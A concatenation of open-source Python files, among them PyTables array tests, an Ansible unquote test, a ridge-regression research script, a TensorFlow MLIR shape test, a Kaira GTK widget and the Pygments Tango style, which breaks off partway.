key in self.not_working_oob: if common.verbose: 
print("Selection to test:", key) self.assertRaises(IndexError, nparr.__getitem__, key) self.assertRaises(IndexError, tbarr.__getitem__, key) def test01d_read(self): """Test for fancy-selections (too many indexes, read).""" nparr = self.nparr tbarr = self.tbarr for key in self.not_working_too_many: if common.verbose: print("Selection to test:", key) # ValueError for numpy 1.6.x and earlier # IndexError in numpy > 1.8.0 self.assertRaises((ValueError, IndexError), nparr.__getitem__, key) self.assertRaises(IndexError, tbarr.__getitem__, key) def test02a_write(self): """Test for fancy-selections (working selections, write).""" nparr = self.nparr tbarr = self.tbarr for key in self.working_keyset: if common.verbose: print("Selection to test:", key) s = nparr[key] nparr[key] = s * 2 tbarr[key] = s * 2 a = nparr[:] b = tbarr[:] self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables modifications does not match.") def test02b_write(self): """Test for fancy-selections (working selections, write, broadcast).""" nparr = self.nparr tbarr = self.tbarr for key in self.working_keyset: if common.verbose: print("Selection to test:", key) # s = nparr[key] nparr[key] = 2 # broadcast value tbarr[key] = 2 # broadcast value a = nparr[:] b = tbarr[:] # if common.verbose: # print("NumPy modified array:", a) # print("PyTables modifyied array:", b) self.assertTrue( numpy.alltrue(a == b), "NumPy array and PyTables modifications does not match.") class FancySelection1(FancySelectionTestCase): shape = (5, 3, 3) # Minimum values class FancySelection2(FancySelectionTestCase): # shape = (5, 3, 3) # Minimum values shape = (7, 3, 3) class FancySelection3(FancySelectionTestCase): # shape = (5, 3, 3) # Minimum values shape = (7, 4, 5) class FancySelection4(FancySelectionTestCase): # shape = (5, 3, 3) # Minimum values shape = (5, 3, 10) class CopyNativeHDF5MDAtom(TestCase): def setUp(self): super(CopyNativeHDF5MDAtom, self).setUp() filename = self._testFilename("array_mdatom.h5") self.h5file 
= tables.open_file(filename, "r") self.arr = self.h5file.root.arr self.copy = tempfile.mktemp(".h5") self.copyh = tables.open_file(self.copy, mode="w") self.arr2 = self.arr.copy(self.copyh.root, newname="arr2") def tearDown(self): self.h5file.close() self.copyh.close() os.remove(self.copy) super(CopyNativeHDF5MDAtom, self).tearDown() def test01_copy(self): """Checking that native MD atoms are copied as-is""" self.assertEqual(self.arr.atom, self.arr2.atom) self.assertEqual(self.arr.shape, self.arr2.shape) def test02_reopen(self): """Checking that native MD atoms are copied as-is (re-open)""" self.copyh.close() self.copyh = tables.open_file(self.copy, mode="r") self.arr2 = self.copyh.root.arr2 self.assertEqual(self.arr.atom, self.arr2.atom) self.assertEqual(self.arr.shape, self.arr2.shape) class AccessClosedTestCase(common.TempFileMixin, TestCase): def setUp(self): super(AccessClosedTestCase, self).setUp() a = numpy.zeros((10, 10)) self.array = self.h5file.create_array(self.h5file.root, 'array', a) def test_read(self): self.h5file.close() self.assertRaises(ClosedNodeError, self.array.read) def test_getitem(self): self.h5file.close() self.assertRaises(ClosedNodeError, self.array.__getitem__, 0) def test_setitem(self): self.h5file.close() self.assertRaises(ClosedNodeError, self.array.__setitem__, 0, 0) class BroadcastTest(common.TempFileMixin, TestCase): def test(self): """Test correct broadcasting when the array atom is not scalar.""" array_shape = (2, 3) element_shape = (3,) dtype = numpy.dtype((numpy.int, element_shape)) atom = Atom.from_dtype(dtype) h5arr = self.h5file.create_carray(self.h5file.root, 'array', atom, array_shape) size = numpy.prod(element_shape) nparr = numpy.arange(size).reshape(element_shape) h5arr[0] = nparr self.assertTrue(numpy.all(h5arr[0] == nparr)) class TestCreateArrayArgs(common.TempFileMixin, TestCase): where = '/' name = 'array' obj = numpy.array([[1, 2], [3, 4]]) title = 'title' byteorder = None createparents = False atom = 
Atom.from_dtype(obj.dtype) shape = obj.shape def test_positional_args(self): self.h5file.create_array(self.where, self.name, self.obj, self.title) self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(self.obj, nparr)) def test_positional_args_atom_shape(self): self.h5file.create_array(self.where, self.name, None, self.title, self.byteorder, self.createparents, self.atom, self.shape) self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(numpy.zeros_like(self.obj), nparr)) def test_kwargs_obj(self): self.h5file.create_array(self.where, self.name, title=self.title, obj=self.obj) self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(self.obj, nparr)) def test_kwargs_atom_shape_01(self): ptarr = self.h5file.create_array(self.where, self.name, title=self.title, atom=self.atom, shape=self.shape) ptarr[...] 
= self.obj self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(self.obj, nparr)) def test_kwargs_atom_shape_02(self): ptarr = self.h5file.create_array(self.where, self.name, title=self.title, atom=self.atom, shape=self.shape) #ptarr[...] = self.obj self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(numpy.zeros_like(self.obj), nparr)) def test_kwargs_obj_atom(self): ptarr = self.h5file.create_array(self.where, self.name, title=self.title, obj=self.obj, atom=self.atom) self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(self.obj, nparr)) def test_kwargs_obj_shape(self): ptarr = self.h5file.create_array(self.where, self.name, title=self.title, obj=self.obj, shape=self.shape) self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(self.obj, nparr)) def test_kwargs_obj_atom_shape(self): ptarr = self.h5file.create_array(self.where, self.name, 
title=self.title, obj=self.obj, atom=self.atom, shape=self.shape) self.h5file.close() self.h5file = tables.open_file(self.h5fname) ptarr = self.h5file.get_node(self.where, self.name) nparr = ptarr.read() self.assertEqual(ptarr.title, self.title) self.assertEqual(ptarr.shape, self.shape) self.assertEqual(ptarr.atom, self.atom) self.assertEqual(ptarr.atom.dtype, self.atom.dtype) self.assertTrue(allequal(self.obj, nparr)) def test_kwargs_obj_atom_error(self): atom = Atom.from_dtype(numpy.dtype('complex')) #shape = self.shape + self.shape self.assertRaises(TypeError, self.h5file.create_array, self.where, self.name, title=self.title, obj=self.obj, atom=atom) def test_kwargs_obj_shape_error(self): #atom = Atom.from_dtype(numpy.dtype('complex')) shape = self.shape + self.shape self.assertRaises(TypeError, self.h5file.create_array, self.where, self.name, title=self.title, obj=self.obj, shape=shape) def test_kwargs_obj_atom_shape_error_01(self): atom = Atom.from_dtype(numpy.dtype('complex')) #shape = self.shape + self.shape self.assertRaises(TypeError, self.h5file.create_array, self.where, self.name, title=self.title, obj=self.obj, atom=atom, shape=self.shape) def test_kwargs_obj_atom_shape_error_02(self): #atom = Atom.from_dtype(numpy.dtype('complex')) shape = self.shape + self.shape self.assertRaises(TypeError, self.h5file.create_array, self.where, self.name, title=self.title, obj=self.obj, atom=self.atom, shape=shape) def test_kwargs_obj_atom_shape_error_03(self): atom = Atom.from_dtype(numpy.dtype('complex')) shape = self.shape + self.shape self.assertRaises(TypeError, self.h5file.create_array, self.where, self.name, title=self.title, obj=self.obj, atom=atom, shape=shape) def suite(): theSuite = unittest.TestSuite() niter = 1 for i in range(niter): # The scalar case test should be refined in order to work theSuite.addTest(unittest.makeSuite(Basic0DOneTestCase)) theSuite.addTest(unittest.makeSuite(Basic0DTwoTestCase)) # 
theSuite.addTest(unittest.makeSuite(Basic1DZeroTestCase)) theSuite.addTest(unittest.makeSuite(Basic1DOneTestCase)) theSuite.addTest(unittest.makeSuite(Basic1DTwoTestCase)) theSuite.addTest(unittest.makeSuite(Basic1DThreeTestCase)) theSuite.addTest(unittest.makeSuite(Basic2DOneTestCase)) theSuite.addTest(unittest.makeSuite(Basic2DTwoTestCase)) theSuite.addTest(unittest.makeSuite(Basic10DTestCase)) # The 32 dimensions case is tested on GroupsArray # theSuite.addTest(unittest.makeSuite(Basic32DTestCase)) theSuite.addTest(unittest.makeSuite(ReadOutArgumentTests)) theSuite.addTest(unittest.makeSuite( SizeOnDiskInMemoryPropertyTestCase)) theSuite.addTest(unittest.makeSuite(GroupsArrayTestCase)) theSuite.addTest(unittest.makeSuite(ComplexNotReopenNotEndianTestCase)) theSuite.addTest(unittest.makeSuite(ComplexReopenNotEndianTestCase)) theSuite.addTest(unittest.makeSuite(ComplexNotReopenEndianTestCase)) theSuite.addTest(unittest.makeSuite(ComplexReopenEndianTestCase)) theSuite.addTest(unittest.makeSuite(CloseCopyTestCase)) theSuite.addTest(unittest.makeSuite(OpenCopyTestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex1TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex2TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex3TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex4TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex5TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex6TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex7TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex8TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex9TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex10TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex11TestCase)) theSuite.addTest(unittest.makeSuite(CopyIndex12TestCase)) theSuite.addTest(unittest.makeSuite(GI1NAOpenTestCase)) theSuite.addTest(unittest.makeSuite(GI1NACloseTestCase)) theSuite.addTest(unittest.makeSuite(GI2NAOpenTestCase)) theSuite.addTest(unittest.makeSuite(GI2NACloseTestCase)) 
theSuite.addTest(unittest.makeSuite(SI1NAOpenTestCase)) theSuite.addTest(unittest.makeSuite(SI1NACloseTestCase)) theSuite.addTest(unittest.makeSuite(SI2NAOpenTestCase)) theSuite.addTest(unittest.makeSuite(SI2NACloseTestCase)) theSuite.addTest(unittest.makeSuite(GE1NAOpenTestCase)) theSuite.addTest(unittest.makeSuite(GE1NACloseTestCase)) theSuite.addTest(unittest.makeSuite(GE2NAOpenTestCase)) theSuite.addTest(unittest.makeSuite(GE2NACloseTestCase)) theSuite.addTest(unittest.makeSuite(NonHomogeneousTestCase)) theSuite.addTest(unittest.makeSuite(TruncateTestCase)) theSuite.addTest(unittest.makeSuite(FancySelection1)) theSuite.addTest(unittest.makeSuite(FancySelection2)) theSuite.addTest(unittest.makeSuite(FancySelection3)) theSuite.addTest(unittest.makeSuite(FancySelection4)) theSuite.addTest(unittest.makeSuite(PointSelection0)) theSuite.addTest(unittest.makeSuite(PointSelection1)) theSuite.addTest(unittest.makeSuite(PointSelection2)) theSuite.addTest(unittest.makeSuite(PointSelection3)) theSuite.addTest(unittest.makeSuite(PointSelection4)) theSuite.addTest(unittest.makeSuite(CopyNativeHDF5MDAtom)) theSuite.addTest(unittest.makeSuite(AccessClosedTestCase)) theSuite.addTest(unittest.makeSuite(TestCreateArrayArgs)) theSuite.addTest(unittest.makeSuite(BroadcastTest)) return theSuite if __name__ == '__main__': common.parse_argv(sys.argv) common.print_versions() unittest.main(defaultTest='suite')
bsd-3-clause
amousset/ansible
test/units/parsing/test_unquote.py
152
2073
# coding: utf-8 # (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type from nose import tools from ansible.compat.tests import unittest from ansible.parsing.splitter import unquote # Tests using nose's test generators cannot use unittest base class. # http://nose.readthedocs.org/en/latest/writing_tests.html#test-generators class TestUnquote: UNQUOTE_DATA = ( (u'1', u'1'), (u'\'1\'', u'1'), (u'"1"', u'1'), (u'"1 \'2\'"', u'1 \'2\''), (u'\'1 "2"\'', u'1 "2"'), (u'\'1 \'2\'\'', u'1 \'2\''), (u'"1\\"', u'"1\\"'), (u'\'1\\\'', u'\'1\\\''), (u'"1 \\"2\\" 3"', u'1 \\"2\\" 3'), (u'\'1 \\\'2\\\' 3\'', u'1 \\\'2\\\' 3'), (u'"', u'"'), (u'\'', u'\''), # Not entirely sure these are good but they match the current # behaviour (u'"1""2"', u'1""2'), (u'\'1\'\'2\'', u'1\'\'2'), (u'"1" 2 "3"', u'1" 2 "3'), (u'"1"\'2\'"3"', u'1"\'2\'"3'), ) def check_unquote(self, quoted, expected): tools.eq_(unquote(quoted), expected) def test_unquote(self): for datapoint in self.UNQUOTE_DATA: yield self.check_unquote, datapoint[0], datapoint[1]
gpl-3.0
linhvannguyen/PhDworks
codes/isotropic/regression/regressionUtils.py
2
10304
""" Created on Aug 02 2016 @author: Linh Van Nguyen (linh.van.nguyen@hotmail.com) """ import numpy as np from netCDF4 import Dataset def data_preprocess(sspacing, tspacing): """ Load coupled input-output of LR and HR from file and normalize to zero-mean and one- standard deviation Parameters ---------- sspacing : 2D subsampling ratio in space (in one direction) tspacing : 1D subsampling ratio in time """ # Constants Nh = 96 Nt = 37 # Position of measurements in space-time HTLS_sknots = np.arange(0,Nh,sspacing) LTHS_tknots = np.arange(0,Nh,tspacing) Nl = len(HTLS_sknots) Ns = len(LTHS_tknots) # Dimension of HTLS and LTHS P = Nh*Nh Q = Nl*Nl M = Nt*Ns #Load all training data Xh_tr = np.zeros((M, P)) Xl_tr = np.zeros((M, Q)) ncfile1 = Dataset('/data/ISOTROPIC/data/data_downsampled4.nc','r') for t in range(Nt): count = 0 for i in LTHS_tknots: xh = np.array(ncfile1.variables['velocity_x'][t,0:Nh,0:Nh,i]) xl = xh[0:-1:sspacing,0:-1:sspacing] # xh[np.meshgrid(HTLS_sknots,HTLS_sknots)] Xh_tr[t*Ns + count,:] = np.reshape(xh,(1, P)) Xl_tr[t*Ns + count,:] = np.reshape(xl,(1, Q)) count = count + 1 ncfile1.close() # normalized: centered, variance 1 mea_l = np.zeros(Q) sig_l = np.zeros(Q) for k in range(Q): mea_l[k] = np.mean(Xl_tr[:,k]) sig_l[k] = np.std(Xl_tr[:,k]) Xl_tr[:,k] = (Xl_tr[:,k]-mea_l[k])/sig_l[k] mea_h = np.zeros(P) sig_h = np.zeros(P) for k in range(P): mea_h[k] = np.mean(Xh_tr[:,k]) sig_h[k] = np.std(Xh_tr[:,k]) Xh_tr[:,k] = (Xh_tr[:,k]-mea_h[k])/sig_h[k] return (Xl_tr, mea_l, sig_l, Xh_tr,mea_h,sig_h) ####################### RIDGE REGRESSION ###################################### def RR_cv_estimate_alpha(sspacing, tspacing, alphas): """ Estimate the optimal regularization parameter using grid search from a list and via k-fold cross validation Parameters ---------- sspacing : 2D subsampling ratio in space (in one direction) tspacing : 1D subsampling ratio in time alphas : list of regularization parameters to do grid search """ #Load all training data (Xl_tr, 
mea_l, sig_l, Xh_tr,mea_h,sig_h) = data_preprocess(sspacing, tspacing) # RidgeCV from sklearn.linear_model import RidgeCV ridge = RidgeCV(alphas = alphas, cv = 10, fit_intercept=False, normalize=False) ridge.fit(Xl_tr, Xh_tr) RR_alpha_opt = ridge.alpha_ print('\n Optimal lambda:', RR_alpha_opt) # save to .mat file import scipy.io as io filename = "".join(['/data/PhDworks/isotropic/regerssion/RR_cv_alpha_sspacing', str(sspacing),'_tspacing',str(tspacing),'.mat']) io.savemat(filename, dict(alphas=alphas, RR_alpha_opt=RR_alpha_opt)) # return return RR_alpha_opt def RR_allfields(sspacing, tspacing, RR_alpha_opt): """ Reconstruct all fields using RR and save to netcdf file Parameters ---------- sspacing : 2D subsampling ratio in space (in one direction) tspacing : 1D subsampling ratio in time RR_alpha_opt : optimal regularization parameter given from RR_cv_estimate_alpha(sspacing, tspacing, alphas) """ # Constants Nh = 96 Nt = 37 #Load all training data (Xl_tr, mea_l, sig_l, Xh_tr,mea_h,sig_h) = data_preprocess(sspacing, tspacing) # Ridge Regression from sklearn.linear_model import Ridge ridge = Ridge(alpha=RR_alpha_opt, fit_intercept=False, normalize=False) ridge.fit(Xl_tr, Xh_tr) print np.shape(ridge.coef_) # Prediction and save to file filename = "".join(['/data/PhDworks/isotropic/regerssion/RR_sspacing', str(sspacing),'_tspacing',str(tspacing),'.nc']) import os try: os.remove(filename) except OSError: pass ncfile2 = Dataset(filename, 'w') ncfile1 = Dataset('/data/PhDworks/isotropic/refdata_downsampled4.nc','r') # create the dimensions ncfile2.createDimension('Nt',Nt) ncfile2.createDimension('Nz',Nh) ncfile2.createDimension('Ny',Nh) ncfile2.createDimension('Nx',Nh) # create the var and its attribute var = ncfile2.createVariable('Urec', 'd',('Nt','Nz','Ny','Nx')) for t in range(Nt): print('3D snapshot:',t) for i in range(Nh): xl = np.array(ncfile1.variables['velocity_x'][t,0:Nh:sspacing,0:Nh:sspacing,i]) # load only LR xl = np.divide(np.reshape(xl,(1, xl.size)) - 
mea_l, sig_l) #pre-normalize xrec = np.multiply(ridge.predict(xl), sig_h) + mea_h # re-normalize the prediction var[t,:,:,i] = np.reshape(xrec, (Nh,Nh)) # put to netcdf file # Close file ncfile1.close() ncfile2.close() def RR_validationcurve(sspacing, tspacing, RR_lambda_opt, lambdas_range): """ Reconstruct all fields using RR and save to netcdf file Parameters ---------- sspacing : 2D subsampling ratio in space (in one direction) tspacing : 1D subsampling ratio in time RR_alpha_opt : optimal regularization parameter given from RR_cv_estimate_alpha(sspacing, tspacing, alphas) """ # lambdas_range= np.logspace(-2, 4, 28) #Load all training data (Xl_tr, mea_l, sig_l, Xh_tr,mea_h,sig_h) = data_preprocess(sspacing, tspacing) # validation curve from sklearn.linear_model import Ridge from sklearn.learning_curve import validation_curve train_MSE, test_MSE = validation_curve(Ridge(),Xl_tr, Xh_tr, param_name="alpha", param_range=lambdas_range, scoring = "mean_squared_error", cv=10) # API always tries to maximize a loss function, so MSE is actually in the flipped sign train_MSE = -train_MSE test_MSE = -test_MSE # save to .mat file import scipy.io as sio sio.savemat('/data/PhDworks/isotropic/regerssion/RR_crossvalidation.mat', dict(lambdas_range=lambdas_range, train_MSE = train_MSE, test_MSE = test_MSE)) return (train_MSE, test_MSE) def RR_learningcurve(sspacing, tspacing, RR_lambda_opt, train_sizes): # train_sizes=np.linspace(.1, 1.0, 20) #Load all training data (Xl_tr, mea_l, sig_l, Xh_tr,mea_h,sig_h) = data_preprocess(sspacing, tspacing) # Learning curve from sklearn.linear_model import Ridge from sklearn.learning_curve import learning_curve from sklearn import cross_validation estimator = Ridge(alpha=RR_lambda_opt, fit_intercept=False, normalize=False) cv = cross_validation.ShuffleSplit(np.shape(Xl_tr)[0], n_iter=50, test_size=0.1, random_state=0) train_sizes, train_MSE, test_MSE = learning_curve(estimator, Xl_tr, Xh_tr, cv=cv, n_jobs=4, train_sizes = train_sizes, scoring 
= "mean_squared_error") # save to .mat file import scipy.io as sio sio.savemat('/data/PhDworks/isotropic/regerssion/RR_learningcurve.mat', dict(train_sizes=train_sizes, train_MSE = -train_MSE, test_MSE = -test_MSE)) ####################### OTHER FUNCTIONS ####################################### def plot_learning_curve(estimator, plt, X, y, ylim=None, cv=None, n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)): """ Generate a simple plot of the test and traning learning curve. Parameters ---------- estimator : object type that implements the "fit" and "predict" methods An object of that type which is cloned for each validation. plt : current matplotlib plot X : array-like, shape (n_samples, n_features) Training vector, where n_samples is the number of samples and n_features is the number of features. y : array-like, shape (n_samples) or (n_samples, n_features), optional Target relative to X for classification or regression; None for unsupervised learning. ylim : tuple, shape (ymin, ymax), optional Defines minimum and maximum yvalues plotted. cv : integer, cross-validation generator, optional If an integer is passed, it is the number of folds (defaults to 3). Specific cross-validation objects can be passed, see sklearn.cross_validation module for the list of possible objects n_jobs : integer, optional Number of jobs to run in parallel (default 1). 
""" if ylim is not None: plt.ylim(*ylim) plt.xlabel("Number of training examples") plt.ylabel("Score") from sklearn.learning_curve import learning_curve train_sizes, train_scores, test_scores = learning_curve(estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes) train_scores_mean = np.mean(train_scores, axis=1) train_scores_std = np.std(train_scores, axis=1) test_scores_mean = np.mean(test_scores, axis=1) test_scores_std = np.std(test_scores, axis=1) plt.fill_between(train_sizes, train_scores_mean - train_scores_std, train_scores_mean + train_scores_std, alpha=0.1, color="r") plt.fill_between(train_sizes, test_scores_mean - test_scores_std, test_scores_mean + test_scores_std, alpha=0.1, color="g") plt.plot(train_sizes, train_scores_mean, 'o-', color="r", label="Training score") plt.plot(train_sizes, test_scores_mean, 'o-', color="g", label="Cross-validation score") plt.grid() plt.legend(loc="best") return plt def interp2 (x, y, z, xnew, ynew, kind='cubic'): from scipy import interpolate f = interpolate.interp2d(x, y, z, kind=kind) return f(xnew, ynew) def NRMSE (xref, xrec): err = np.sqrt(np.sum(np.square(xref.ravel()-xrec.ravel())))/np.sqrt(np.sum(np.square(xref.ravel()))) return err
mit
tensorflow/tensorflow
tensorflow/compiler/mlir/tensorflow/tests/tf_saved_model/shapes_for_arguments.py
21
1840
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # RUN: %p/shapes_for_arguments | FileCheck %s # pylint: disable=missing-docstring,line-too-long from __future__ import absolute_import from __future__ import division from __future__ import print_function import tensorflow.compat.v2 as tf from tensorflow.compiler.mlir.tensorflow.tests.tf_saved_model import common class TestModule(tf.Module): # Check that we get shapes annotated on function arguments. # # Besides checking the shape on the function input argument, this test also # checks that the shape on the input argument is propagated to the return # value. # We eventually want to move the shape inference to a pass separate from # the initial import, in which case that aspect of this test doesn't make much # sense and will be superceded by MLIR->MLIR shape inference tests. # # CHECK: func {{@[a-zA-Z_0-9]+}}(%arg0: tensor<f32> {{.*}}) -> (tensor<f32> {{.*}}) # CHECK-SAME: attributes {{.*}} tf_saved_model.exported_names = ["some_function"] @tf.function(input_signature=[tf.TensorSpec([], tf.float32)]) def some_function(self, x): return x if __name__ == '__main__': common.do_test(TestModule)
apache-2.0
Palasekm/Kaira
gui/packages.py
1
1929
#
#    Copyright (C) 2012 Stanislav Bohm
#
#    This file is part of Kaira.
#
#    Kaira is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, version 3 of the License, or
#    (at your option) any later version.
#
#    Kaira is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with Kaira. If not, see <http://www.gnu.org/licenses/>.
#

import gtkutils
import gtk
import os

import paths


class PackagesWidget(gtk.Table):
    """Two-pane package picker.

    The left list shows packages available in paths.PACKAGES_DIR (one
    entry per ``*.proj`` file, without the extension); the right list
    shows packages the user has selected. Double-clicking a row moves
    the package between the two lists.
    """

    def __init__(self, project):
        gtk.Table.__init__(self, 2, 2)
        self.project = project
        self.packages_list = gtkutils.SimpleList([("Available packages", str)])
        self.selected_list = gtkutils.SimpleList([("Selected packages", str)])
        self.attach(self.packages_list, 0, 1, 1, 2)
        self.attach(self.selected_list, 1, 2, 1, 2)
        self.read_available_packages()
        # Row activation (double-click / Enter) moves a package across.
        self.packages_list.connect_view("row-activated",
                                        self._on_available_activated)
        self.selected_list.connect_view("row-activated",
                                        self._on_selected_activated)

    def _on_available_activated(self, view, path, column):
        # Signal adapter: ignore the view/path/column arguments.
        self.add_package()

    def _on_selected_activated(self, view, path, column):
        # Signal adapter: ignore the view/path/column arguments.
        self.remove_package()

    def read_available_packages(self):
        """Populate the available list from *.proj files in PACKAGES_DIR."""
        suffix = ".proj"
        rows = []
        for entry in os.listdir(paths.PACKAGES_DIR):
            if entry.endswith(suffix):
                rows.append((entry[:-len(suffix)],))
        self.packages_list.fill(rows)

    def add_package(self):
        """Move the currently selected available package to the selected list."""
        chosen = self.packages_list.get_and_remove_selection(0)
        self.selected_list.append((chosen,))

    def remove_package(self):
        """Move the currently selected package back to the available list."""
        chosen = self.selected_list.get_and_remove_selection(0)
        self.packages_list.append((chosen,))
gpl-3.0
dhenrygithub/QGIS
python/ext-libs/pygments/styles/tango.py
363
7096
# -*- coding: utf-8 -*-
"""
    pygments.styles.tango
    ~~~~~~~~~~~~~~~~~~~~~

    The Crunchy default Style inspired from the color palette from
    the Tango Icon Theme Guidelines.

    http://tango.freedesktop.org/Tango_Icon_Theme_Guidelines

    Butter:     #fce94f     #edd400     #c4a000
    Orange:     #fcaf3e     #f57900     #ce5c00
    Chocolate:  #e9b96e     #c17d11     #8f5902
    Chameleon:  #8ae234     #73d216     #4e9a06
    Sky Blue:   #729fcf     #3465a4     #204a87
    Plum:       #ad7fa8     #75507b     #5c35cc
    Scarlet Red:#ef2929     #cc0000     #a40000
    Aluminium:  #eeeeec     #d3d7cf     #babdb6
                #888a85     #555753     #2e3436

    Not all of the above colors are used; other colors added:
        very light grey: #f8f8f8  (for background)

    This style can be used as a template as it includes all the known
    Token types, unlike most (if not all) of the styles included in the
    Pygments distribution.

    However, since Crunchy is intended to be used by beginners, we have strived
    to create a style that gloss over subtle distinctions between different
    categories.

    Taking Python for example, comments (Comment.*) and docstrings (String.Doc)
    have been chosen to have the same style.  Similarly, keywords (Keyword.*),
    and Operator.Word (and, or, in) have been assigned the same style.

    :copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
    :license: BSD, see LICENSE for details.
"""

from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
     Number, Operator, Generic, Whitespace, Punctuation, Other, Literal


class TangoStyle(Style):
    """
    The Crunchy default Style inspired from the color palette from
    the Tango Icon Theme Guidelines.
    """

    # work in progress...

    background_color = "#f8f8f8"
    default_style = ""

    # Per the Pygments Style API, each entry maps a token type to a style
    # string: an optional modifier ("bold"/"italic"/"underline"), a
    # foreground color, and optionally "border:<color>". Subtypes inherit
    # from their parent token unless overridden, but every known subtype is
    # listed here explicitly so the file can serve as a template.
    styles = {
        # No corresponding class for the following:
        #Text:                     "", # class:  ''
        Whitespace:                "underline #f8f8f8",      # class: 'w'
        Error:                     "#a40000 border:#ef2929", # class: 'err'
        Other:                     "#000000",                # class 'x'

        Comment:                   "italic #8f5902", # class: 'c'
        Comment.Multiline:         "italic #8f5902", # class: 'cm'
        Comment.Preproc:           "italic #8f5902", # class: 'cp'
        Comment.Single:            "italic #8f5902", # class: 'c1'
        Comment.Special:           "italic #8f5902", # class: 'cs'

        Keyword:                   "bold #204a87",   # class: 'k'
        Keyword.Constant:          "bold #204a87",   # class: 'kc'
        Keyword.Declaration:       "bold #204a87",   # class: 'kd'
        Keyword.Namespace:         "bold #204a87",   # class: 'kn'
        Keyword.Pseudo:            "bold #204a87",   # class: 'kp'
        Keyword.Reserved:          "bold #204a87",   # class: 'kr'
        Keyword.Type:              "bold #204a87",   # class: 'kt'

        Operator:                  "bold #ce5c00",   # class: 'o'
        Operator.Word:             "bold #204a87",   # class: 'ow' - like keywords

        Punctuation:               "bold #000000",   # class: 'p'

        # because special names such as Name.Class, Name.Function, etc.
        # are not recognized as such later in the parsing, we choose them
        # to look the same as ordinary variables.
        Name:                      "#000000",        # class: 'n'
        Name.Attribute:            "#c4a000",        # class: 'na' - to be revised
        Name.Builtin:              "#204a87",        # class: 'nb'
        Name.Builtin.Pseudo:       "#3465a4",        # class: 'bp'
        Name.Class:                "#000000",        # class: 'nc' - to be revised
        Name.Constant:             "#000000",        # class: 'no' - to be revised
        Name.Decorator:            "bold #5c35cc",   # class: 'nd' - to be revised
        Name.Entity:               "#ce5c00",        # class: 'ni'
        Name.Exception:            "bold #cc0000",   # class: 'ne'
        Name.Function:             "#000000",        # class: 'nf'
        Name.Property:             "#000000",        # class: 'py'
